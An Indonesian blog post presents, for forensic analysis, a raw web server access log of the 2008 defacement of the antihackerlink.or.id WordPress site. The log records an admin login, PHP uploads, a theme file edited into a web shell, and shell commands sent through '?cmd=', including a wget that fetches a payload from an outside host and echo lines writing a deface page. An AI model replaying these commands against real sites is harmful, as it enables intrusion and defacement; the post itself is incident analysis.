Select Page

Mohon maaf sebelumnya atas keterlambatan posting di blog ini mengenai part 2 antihackerlink was hacked, dikarenakan kesibukan dunia nyata.:). Ok langsung saja kali ini analisa forensic dilakukan melalui raw log access server antihackerlink Disini kami sengaja hanya  sediakan log access tersebut. Silahkan analisa bersama disini :).

88.237.213.52 – – [04/Dec/2008:04:52:28 +0700] “GET / HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:04:53:21 +0700] “GET /?page_id=2 HTTP/1.1″ 200 12535 ”
88.237.213.52 – – [04/Dec/2008:04:54:23 +0700] “GET / HTTP/1.1” <- “http://www.google.com/search?client=opera&rls=tr&q=antihackerlink.or.id&sourceid=opera&ie=utf-8&oe=utf-8”
88.237.213.52 – – [04/Dec/2008:05:01:50 +0700] “GET /wp-login.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:01:58 +0700] “POST /wp-login.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:01:59 +0700] “GET /wp-admin/ HTTP/1.1” <- “http://antihackerlink.or.id/wp-login.php”
88.237.213.52 – – [04/Dec/2008:05:02:06 +0700] “GET /wp-admin/edit.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:02:10 +0700] “GET /wp-admin/post.php?action=edit&post=34 HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:02:51 +0700] “GET /wp-admin/media-upload.php?post_id=34&type=image& HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:03:00 +0700] “POST /wp-admin/async-upload.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:03:05 +0700] “POST /wp-admin/async-upload.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:03:26 +0700] “POST /wp-admin/admin-ajax.php HTTP/1.1” <- “http://antihackerlink.or.id/wp-admin/post.php?action=edit&post=34”
88.237.213.52 – – [04/Dec/2008:05:03:26 +0700] “POST /wp-admin/admin-ajax.php HTTP/1.1” <- “http://antihackerlink.or.id/wp-admin/post.php?action=edit&post=34”
88.237.213.52 – – [04/Dec/2008:05:03:35 +0700] “GET /wp-content/uploads/2008/12/405.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:03:39 +0700] “GET /wp-content/uploads/2008/12/405.php/ HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:04:31 +0700] “GET /wp-admin/media-upload.php?post_id=34&type=image& HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:04:44 +0700] “POST /wp-admin/media-upload.php?type=image&tab=type&post_id=34 HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:05:18 +0700] “GET /wp-content/uploads/2008/12/403.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:05:20 +0700] “GET /wp-content/uploads/2008/12/403.php/ HTTP/1.1”
….. ……
….. ……
….. ……
….. ……
88.237.213.52 – – [04/Dec/2008:05:05:50 +0700] “GET /wp-admin/theme-editor.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:06:04 +0700] “GET /wp-admin/theme-editor.php?file=/themes/illacrimo/footer.php&theme=Illacrimo HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:06:39 +0700] “POST /wp-admin/theme-editor.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:06:50 +0700] “GET /wp-admin/theme-editor.php?file=/themes/illacrimo/footer.php&theme=Illacrimo&a=te HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:07:18 +0700] “POST /wp-admin/theme-editor.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:07:42 +0700] “GET /wp-admin/theme-editor.php?file=/themes/illacrimo/footer.php&theme=Illacrimo&a=te HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:09:56 +0700] “POST /wp-admin/theme-editor.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:10:08 +0700] “GET /wp-content/themes/illacrimo/footer.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:11:52 +0700] “POST /wp-admin/theme-editor.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:11:53 +0700] “GET /wp-admin/theme-editor.php?file=/themes/illacrimo/footer.php&theme=Illacrimo&a=te HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:11:58 +0700] “GET //wp-content/themes/illacrimo/footer.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:12:00 +0700] “GET //wp-content/themes/illacrimo/footer.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:12:05 +0700] “GET //wp-content/themes/illacrimo/
88.237.213.52 – – [04/Dec/2008:05:12:08 +0700] “GET //wp-content/themes/illacrimo/v4.php
88.237.213.52 – – [04/Dec/2008:05:12:09 +0700] “GET //wp-content/themes/illacrimo/v4.php
88.237.213.52 – – [04/Dec/2008:05:12:15 +0700] “GET //wp-content/themes/illacrimo/v454.php
—————-
88.237.213.52 – – [04/Dec/2008:05:12:54 +0700] “GET //wp-content/themes/illacrimo/footer.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:13:04 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=ls HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:13:08 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=ls%20-lia HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:13:45 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=wget%20http://hackzone.kiev.ua/403.txt;mv%20403.txt%20z.php;ls%20-lia HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:14:02 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=wget%20http://hackzone.kiev.ua/403.txt;ls%20-lia HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:14:28 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=wget%20http://0d4y.org;ls%20-lia HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:15:13 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=pwd HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:15:26 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=ls%20-lia%20/home/sakitjiw/public_html/antihackerlink.or.id/ HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:15:49 +0700] “GET /v4.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:18:59 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo%20’hacked%20ogi%20’%3Ev4.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:19:05 +0700] “GET /v4.php
88.237.213.52 – – [04/Dec/2008:05:20:18 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo%20x%20%3Ev4.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:20:21 +0700] “GET /v4.php
88.237.213.52 – – [04/Dec/2008:05:24:27 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo%20%3Ccenter%3E%3Ch2%3E%20%20Hacked%20%3Cbr%3E%20%20By_Ogmass%20&%20S4S_7%3Cbr%3E%20%20Got%20RooT%20?%3Cbr%3E%20%20uid=0(ogis4s)%20gid=0(ogis4s)%20groups=0(ogis4s)%3Cbr%3E%20%20Linux%20aquarius.romantis.net%202.6.9-023stab044.11-enterprise HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:24:36 +0700] “GET /v4.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:25:19 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo’%3Ccenter%3E%3Ch2%3E%20%20Hacked%20%3Cbr%3E%20%20By_Ogmass%20&%20S4S_7%3Cbr%3E%20%20Got%20RooT%20?%3Cbr%3E%20%20uid=0(ogis4s)%20gid=0(ogis4s)%20groups=0(ogis4s)%3Cbr%3E%20%20Linux%20aquarius.romantis.net%202.6.9-023stab044.11-enterprise HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:25:22 +0700] “GET /v4.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:26:59 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo’Hacked%20By_Ogmass%20&%20S4S_7’%3Ev4.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:27:01 +0700] “GET /v4.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:27:27 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo%20’%20Hacked%20By_Ogmass%20&%20S4S_7%20’%20%3Ev4.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:27:41 +0700] “GET / HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:28:17 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/; HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:28:45 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=http://hackzone.kiev.ua/403.txt? HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:28:49 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=http://hackzone.kiev.ua/403.txt? HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:28:51 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=http://hackzone.kiev.ua/403.txt? HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:28:59 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=http://hackzone.kiev.ua HTTP/
88.237.213.52 – – [04/Dec/2008:05:29:03 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd= HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:29:08 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=pwd HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:29:53 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/wp-content/themes/;ls%20-lia HTTP/1.1”

88.237.213.52 – – [04/Dec/2008:05:30:48 +0700] “GET /wp-admin/post-new.php HTTP/1.1”
………………………
88.237.213.52 – – [04/Dec/2008:06:46:38 +0700] “GET / HTTP/1.1″2286 “http://www.zone-h.org/component/option,com_attacks/Itemid,45/filter_defacer,By_Ogmass/”

Shares
Share This